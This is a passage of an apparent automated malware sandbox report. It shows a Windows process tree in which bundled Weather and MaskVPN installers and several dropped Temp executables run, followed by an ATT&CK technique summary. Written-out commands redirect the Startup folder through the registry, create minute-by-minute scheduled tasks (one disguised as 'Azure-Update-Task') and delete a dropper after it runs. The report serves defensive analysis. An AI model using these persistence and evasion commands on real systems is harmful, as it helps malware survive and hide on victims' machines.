                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 91E9F0307644D4DC150AB24BB74F945A C
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                      PID:5392
                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 3935C27D5624452BE79A5D8A40E886AD C
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                      PID:5364
                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding B9C104454FDDEAE5A564A4A175A4E47D
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:6436
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                                                                                        PID:1312
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                                                                          PID:8572
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--Ac4FtzsAeC"
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            PID:6436
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ffa90e89ec0,0x7ffa90e89ed0,0x7ffa90e89ee0
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:5508
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1628,12967830804289776258,7063587930489574224,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6436_1083118695" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1648 /prefetch:2
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:772
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1628,12967830804289776258,7063587930489574224,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6436_1083118695" --mojo-platform-channel-handle=1728 /prefetch:8
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:7144
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1628,12967830804289776258,7063587930489574224,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6436_1083118695" --mojo-platform-channel-handle=2124 /prefetch:8
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                    PID:4084
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1628,12967830804289776258,7063587930489574224,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6436_1083118695" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2664 /prefetch:1
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                                                                    PID:9096
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1628,12967830804289776258,7063587930489574224,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6436_1083118695" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3176 /prefetch:2
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                    PID:6500
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,12967830804289776258,7063587930489574224,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6436_1083118695" --mojo-platform-channel-handle=3140 /prefetch:8
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                      PID:8488
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,12967830804289776258,7063587930489574224,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6436_1083118695" --mojo-platform-channel-handle=3392 /prefetch:8
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                                                                                      PID:8660
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,12967830804289776258,7063587930489574224,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6436_1083118695" --mojo-platform-channel-handle=476 /prefetch:8
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:8744
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,12967830804289776258,7063587930489574224,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6436_1083118695" --mojo-platform-channel-handle=3268 /prefetch:8
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:8156
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,12967830804289776258,7063587930489574224,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6436_1083118695" --mojo-platform-channel-handle=3440 /prefetch:8
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:8256
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,12967830804289776258,7063587930489574224,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6436_1083118695" --mojo-platform-channel-handle=2256 /prefetch:8
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                              PID:7980
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_211D.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                          PID:7904
                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                      PID:8940
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                      PID:4984
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\565F.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\565F.exe
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                      PID:7380
                                                                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                      PID:8412
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                        DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{634f726d-ad03-7d4c-aac5-b14b6386044a}\oemvista.inf" "9" "4d14a44ff" "0000000000000158" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                        PID:6588
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                        DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000158"
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                        PID:8324
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\6739.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\6739.exe
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:8396
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe"
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:7488
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:5420
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                  REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                    PID:6964
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe" /F
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                  PID:7192
                                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:7820
                                                                                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:4724
                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                  PID:8312
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\85ED.exe
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\85ED.exe
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                  PID:8972
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\XSbVttX9vs.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\XSbVttX9vs.exe"
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:8284
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                        PID:5416
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\85ED.exe"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:8684
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                          timeout /T 10 /NOBREAK
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                          PID:9176
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ZBVQmx7WQ9.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\ZBVQmx7WQ9.exe"
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:6244
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                            cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:6044
                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                            PID:8296
                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                            PID:8632
                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                              MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                              PID:2004
                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                            PID:8860
                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                            PID:7568
                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                            PID:9128
                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                            PID:1124
                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                            PID:5696
                                                                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                                                            PID:5144
                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                            PID:4624
                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                            PID:2804
                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                            PID:8664
                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                            PID:7716

                                                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                          Execution

                                                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                                                          Persistence

                                                                                                                                                                                                                                                                                                          Modify Existing Service

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1031

                                                                                                                                                                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1060

                                                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                                                          Privilege Escalation

                                                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                                                          Defense Evasion

                                                                                                                                                                                                                                                                                                          Modify Registry

                                                                                                                                                                                                                                                                                                          4
                                                                                                                                                                                                                                                                                                          T1112

                                                                                                                                                                                                                                                                                                          Disabling Security Tools

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1089

                                                                                                                                                                                                                                                                                                          Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1497

                                                                                                                                                                                                                                                                                                          Install Root Certificate

                                                                                                                                                                                                                                                                                                          1
